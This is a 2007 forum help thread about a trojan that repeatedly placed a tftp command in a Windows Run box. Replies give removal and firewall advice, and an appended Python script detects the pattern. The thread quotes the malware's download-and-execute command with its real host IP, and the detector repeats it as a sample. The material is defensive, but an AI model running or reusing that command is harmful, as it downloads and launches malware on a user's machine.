Run command showing a tftp command on its own

Discussion in 'Computer Support' started by kvine@marchnetworks.com, Jan 12, 2007.

  1. Guest

    Hi

    About 5 times yesterday this would show up in my Run command while it
    was working. I have no idea why and doing a virus and adaware scan
    does not fix it. I do not have Quicken installed on my PC.

    tftp -i 216.104.106.132 get qtask.exe& start qtask.exe& exit

    I just want to get rid of it so what else can I try?

    Thanks
    Ken
     
    , Jan 12, 2007
    #1

  2. wrote:

    > About 5 times yesterday this would show up in my Run command while it
    > was working. I have no idea why and doing a virus and adaware scan
    > does not fix it. I do not have Quicken installed on my PC.
    >
    > tftp -i 216.104.106.132 get qtask.exe& start qtask.exe& exit
    >
    > I just want to get rid of it so what else can I try?


    Maybe you are infected with this:
    http://www.sophos.com/security/analyses/w32rbotaku.html
    ...which says it uses the filename qtask.exe

    Or maybe you have some other trojan that is trying to download it.
    Try the first three (free) anti-spyware programs listed here:
    http://k75s.home.att.net/tips.html#spyware

    --
    -bts
    -Motorcycles defy gravity; cars just suck
     
    Beauregard T. Shagnasty, Jan 12, 2007
    #2

  3. why? Guest

    On 12 Jan 2007 05:34:19 -0800, wrote:

    >Hi
    >
    >About 5 times yesterday this would show up in my Run command while it
    >was working. I have no idea why and doing a virus and adaware scan
    >does not fix it. I do not have Quicken installed on my PC.


    So then tell your firewall to

    a) block tftp.exe or .com as an app
    b) block the IP address
    c) block the (default) port
    http://www.iana.org/assignments/port-numbers
    tftp 69/tcp Trivial File Transfer
    tftp 69/udp Trivial File Transfer

    >tftp -i 216.104.106.132 get qtask.exe& start qtask.exe& exit


    Output from ARIN WHOIS
    Search results for: 216.104.106.132

    OrgName: Cyber Beach Communications
    OrgID: CBCH
    Address: 500 Barrydowne Rd
    City: Sudbury
    StateProv: ON
    PostalCode: P3A-5W1
    Country: CA

    Ask them?

    >I just want to get rid of it so what else can I try?


    d) rename tftp.exe / .com
    e) delete it (c)

    >Thanks
    >Ken


    Fairly simple.

    Me
     
    why?, Jan 12, 2007
    #3
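The command quoted in this thread chains a TFTP download with an immediate `start` of the downloaded file. As an added example that is not part of the original thread, the following Python sketch flags that download-then-run pattern in command-line strings such as Run-dialog history entries or process-creation logs. The function names are hypothetical, and every sample line other than the one quoted from the thread is constructed.

```python
import re

TFTP_NAMES = {"tftp", "tftp.exe"}

def split_chain(cmdline):
    """Split on unquoted & / && / | / ||, as cmd.exe does when chaining."""
    parts, buf, quoted = [], [], False
    for ch in cmdline:
        if ch == '"':
            quoted = not quoted
        if ch in "&|" and not quoted:
            parts.append("".join(buf).strip())
            buf = []
        else:
            buf.append(ch)
    parts.append("".join(buf).strip())
    return [p for p in parts if p]

def basename(token):
    """File name of a possibly quoted Windows path, lower-cased."""
    return re.split(r"[\\/]", token.strip('"'))[-1].lower()

def tftp_download(tokens):
    """Local file written by 'tftp [-i] host get source [dest]', else None."""
    if not tokens or basename(tokens[0]) not in TFTP_NAMES:
        return None
    args = [t for t in tokens[1:] if t.lower() != "-i"]
    if len(args) >= 3 and args[1].lower() == "get":
        return basename(args[3] if len(args) > 3 else args[2])
    return None

def analyze(cmdline):
    """Return findings: ('tftp-get', file) and ('runs-download', file)."""
    fetched, findings = set(), []
    for part in split_chain(cmdline):
        tokens = re.findall(r'"[^"]*"|\S+', part)
        name = tftp_download(tokens)
        if name:
            fetched.add(name)
            findings.append(("tftp-get", name))
            continue
        if tokens and tokens[0].lower() == "start":
            # Drop start's switches and an empty "" window title.
            tokens = [t for t in tokens[1:] if not t.startswith("/") and t.strip('"')]
        if tokens and basename(tokens[0]) in fetched:
            findings.append(("runs-download", basename(tokens[0])))
    return findings

SAMPLES = [
    "tftp -i 216.104.106.132 get qtask.exe& start qtask.exe& exit",  # quoted in the thread
    "tftp -i 192.0.2.10 get config.bin",  # constructed: download only
    'cmd /c echo "a & b"',                # constructed: quoted ampersand, benign
]
```

A line that yields both a `tftp-get` and a `runs-download` finding for the same file is the pattern worth escalating; a lone `tftp-get` may be legitimate device administration.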